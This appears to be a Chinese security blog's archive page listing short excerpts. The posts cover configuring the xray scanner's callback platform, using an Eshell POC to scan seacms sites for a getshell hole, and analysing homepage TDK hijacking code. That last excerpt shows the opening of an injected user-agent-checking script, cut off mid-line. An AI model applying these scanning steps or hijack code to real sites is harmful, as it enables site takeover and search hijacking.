月度归档: 2024 年 9 月

4 篇文章

xray部署到使用踩坑指南
|
0
|
0
|
网络安全

89 字
|
2 分钟
一.反连平台服务端部署报错问题 # 反连平台配置,更多解释见 https://docs.xray.cool/#/configration/reverse # 注意: 默认配置为禁用反连平台,这是无法扫描出依赖反连平台的漏洞,这些漏洞包括 fastjson,ssrf 以及 poc 中依赖反连的情况等 reverse: db_file_path: "t…
Eshell-POC使用范例
|
33
|
0
|
渗透劫持,网络安全

107 字
|
1 分钟内
一.将poc放置在admin_poc文件夹 二.打开Eshell-网站扫描,导入要扫描的seacms域名(先用cms识别功能获得seacms域名),选中poc模式开启(必须),选中你要测试的漏洞(这里勾选seacms漏洞),点击开始扫描。 三.结果验证 显示漏洞存在,即为getshell。
首页tdk劫持-劫持代码分析
|
36
|
0
|
渗透劫持,网络安全

109 字
|
2 分钟
一.劫持代码 <title>标题</title> <meta name="keywords" content="关键词,关键词1,关键词2,关键词3"/> <meta name="description" content="描述"/> <script>if(!navigator.userAgent.toLocaleLo…